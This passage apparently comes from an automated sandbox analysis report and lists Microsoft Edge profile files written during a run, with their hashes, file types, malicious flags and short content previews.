                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.872 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/08-18:43:30.873 1e04 Recovering log #3.2025/03/08-18:43:30.873 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1425679852176085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvOTF34q2Pwkn23oH+Tcwt8NIFUtdOWPBJZmwrOWPBDkwOwkn23oH+Tcwt8+eLJ:7GTOvYfYebpFUtsWPr/6WPh5JfYebqJ
                                                                                                                                                                                                                                                                                                MD5:EAA283E770C83B26E2D90D6CA445A2CE
                                                                                                                                                                                                                                                                                                SHA1:44BB6D4A797346E97AEF21620395110A82B370CA
                                                                                                                                                                                                                                                                                                SHA-256:5E3E843C261F8DBD6E8C6BBD492611C8D68CF171ED5CD0B0B78C2DFE8EFE1163
                                                                                                                                                                                                                                                                                                SHA-512:294B31E29C2AFDAFACAEC162089D64AB48A4D645F6014B189A0867911B1921FACF6E7AE4832A9A4C358F1C160D21E2DA1C2BB1E951F2A11DFD0546D5A47819DC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.872 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/08-18:43:30.873 1e04 Recovering log #3.2025/03/08-18:43:30.873 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                                MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                                SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                                SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                                SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                                MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                                SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                                SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                                SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                                MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                                                                                                                                                SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                                                                                                                                                SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                                                                                                                                                SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3283577581710296
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:+gHA/J3+t76Y4QZZofU99pO0BYybqR4EZY4QZvGSn:PghHQws9LdbOBQZGSn
                                                                                                                                                                                                                                                                                                MD5:66EA8213AD398BFD136717CC87543CFB
                                                                                                                                                                                                                                                                                                SHA1:6535004F7712F1C15702D2817D356D45666593B7
                                                                                                                                                                                                                                                                                                SHA-256:79233BDA3A226E8D3C47099911020C9EA658107AC83AE184094E9E9D619222A1
                                                                                                                                                                                                                                                                                                SHA-512:7B06DEAE44115C754C7B0227D67A30399E0A8403246B1B304147BEE294E6EAE44F9AC9ECB9F23A1978B8081410720C253C639276B5B423F7E431F6ABDC8F533D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.............!.....'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.548758796552725
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:zj9P0Vgam6IWQkQerTcfP/Kbt+773pLsRKToaAQhf:zdvGe2ofP/P7aRKc09
                                                                                                                                                                                                                                                                                                MD5:48B53B99213349A38B62FC903FB9F273
                                                                                                                                                                                                                                                                                                SHA1:1236F2F11D3B1030C90A66283685641B9B301407
                                                                                                                                                                                                                                                                                                SHA-256:F462172BD2FDABD893146A1B7E16AAB99E02A1323E469E35552E642A4719D86A
                                                                                                                                                                                                                                                                                                SHA-512:4E70D0327D2136C340D9C4193735F5533277E02C5288CA950622075220F8BF39129DD4AB9501391735D9037F14250D4AC529C76F9A206E0ED109313A93F29E11
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.255736898764073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7sSvYfYeb8rcHEZrELFUtyJ/oD5JfYeb8rcHEZrEZSJ:7lYfYeb8nZrExgDJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:FC64F457B11E9676AB76524F5F706315
                                                                                                                                                                                                                                                                                                SHA1:735F386FA3D58D989C6E157712AD32F620A37998
                                                                                                                                                                                                                                                                                                SHA-256:C5B5FC9C6E76F2A1E8D6D0C68316A8FA1C55C10173029FF54470E39ECED76A8C
                                                                                                                                                                                                                                                                                                SHA-512:10F3F74840CC72CD36148392A5B74E5BCC0E900E4C855C2345208352B001E7C7EA8852773C8D0CD8A51EDB35A67F5CFC17B28CE67C6944760B5D4FDA36DC263C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:33.072 1df0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/08-18:43:33.074 1df0 Recovering log #3.2025/03/08-18:43:33.074 1df0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.255736898764073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7sSvYfYeb8rcHEZrELFUtyJ/oD5JfYeb8rcHEZrEZSJ:7lYfYeb8nZrExgDJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:FC64F457B11E9676AB76524F5F706315
                                                                                                                                                                                                                                                                                                SHA1:735F386FA3D58D989C6E157712AD32F620A37998
                                                                                                                                                                                                                                                                                                SHA-256:C5B5FC9C6E76F2A1E8D6D0C68316A8FA1C55C10173029FF54470E39ECED76A8C
                                                                                                                                                                                                                                                                                                SHA-512:10F3F74840CC72CD36148392A5B74E5BCC0E900E4C855C2345208352B001E7C7EA8852773C8D0CD8A51EDB35A67F5CFC17B28CE67C6944760B5D4FDA36DC263C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:33.072 1df0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/08-18:43:33.074 1df0 Recovering log #3.2025/03/08-18:43:33.074 1df0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.645144189276708
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:VZnp0w8MkvcK7MXREV03Sx4LylsryDumWLrRHHS2/41:VJKcKaRK2osuoTQ1
                                                                                                                                                                                                                                                                                                MD5:8B18711ADE649E07BBDC5DB8B59F88F6
                                                                                                                                                                                                                                                                                                SHA1:798F1D833C61C3801AD06A319C993BC18D724ACC
                                                                                                                                                                                                                                                                                                SHA-256:93F603619F0E4FB8EF15C7E3DD313317B5DCE1BAC4E84DCF8661458A3A168982
                                                                                                                                                                                                                                                                                                SHA-512:6CACF6E88EE40F37A1488B55032B8435B5BF0627F76AE3A4A040F9676CF3CE93AED760A4D9B7EBAFEE0431CAF4522285B4DD8B13F279E57B2C3CA7258C8C0142
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..l..................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1741477429290.-_https://ntp.msn.com..LastVisuallyReadyMarker..1741477430176.._https://ntp.msn.com..MUID!.0815C547F66A6ADB3C0FD0EEF7EC6BB9.%_https://ntp.msn.com..authRecordTrail...[{"time":"2025-03-08T23:43:49.189Z","action":"NUT","result":"SUCCESS","state":{"isSignedIn":false,"accountType":"UNSUPPORTED_SOVEREIGNTY","signedInAccounts":[0],"storage":{"elt":0,"lt":0,"aace":0,"ace":0,"app_anon":0,"anon":0,"app_wid":0},"appType":"edgeChromium","pageType":"dhp"}}].._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1741477429365,"schedule":[-1,9,-1,4,29,-1,-1],"scheduleFixed":[-1,9,-1,4,29,-1,-1],"simpleSchedule":[35,17,30,21,25,33,22]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250307.574"}.*_https://ntp.msn.com..piv

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.157331743987169
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvIut+q2Pwkn23oH+Tcwt8a2jMGIFUtdIkXZmwrI1BVkwOwkn23oH+Tcwt8a2jz:7ovYfYeb8EFUtJ/uP5JfYeb8bJ
                                                                                                                                                                                                                                                                                                MD5:7E62BA226F9DC72F364DD242F90B8236
                                                                                                                                                                                                                                                                                                SHA1:D598D4AAB7D5A665A97E87C044D7EEB1ED3C4353
                                                                                                                                                                                                                                                                                                SHA-256:27B1EACE50D82D768609C8181BC59252E7BBD7794219AE05FA6270840AB77BF9
                                                                                                                                                                                                                                                                                                SHA-512:4AE487CDD98ABA28F82E5F2502B24454375A490D49FDD0537C5D82430B07FB7C0CF1AAE6E3B1A6DAD153E58DEAFF3263485243132E08152ABEA5C4D22879A8AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.332 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:43:30.334 4b8 Recovering log #3.2025/03/08-18:43:30.346 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.157331743987169
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvIut+q2Pwkn23oH+Tcwt8a2jMGIFUtdIkXZmwrI1BVkwOwkn23oH+Tcwt8a2jz:7ovYfYeb8EFUtJ/uP5JfYeb8bJ
                                                                                                                                                                                                                                                                                                MD5:7E62BA226F9DC72F364DD242F90B8236
                                                                                                                                                                                                                                                                                                SHA1:D598D4AAB7D5A665A97E87C044D7EEB1ED3C4353
                                                                                                                                                                                                                                                                                                SHA-256:27B1EACE50D82D768609C8181BC59252E7BBD7794219AE05FA6270840AB77BF9
                                                                                                                                                                                                                                                                                                SHA-512:4AE487CDD98ABA28F82E5F2502B24454375A490D49FDD0537C5D82430B07FB7C0CF1AAE6E3B1A6DAD153E58DEAFF3263485243132E08152ABEA5C4D22879A8AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:30.332 4b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:43:30.334 4b8 Recovering log #3.2025/03/08-18:43:30.346 4b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57344
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                                MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                                SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                                SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                                SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                                MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                                SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                                SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                                SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\37f87066-8e3e-41c6-9642-0bc33a041922.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                                MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                                SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                                SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                                SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sts":[],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4b8eb820-6af3-4c85-94d1-15bc41e8cad1.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
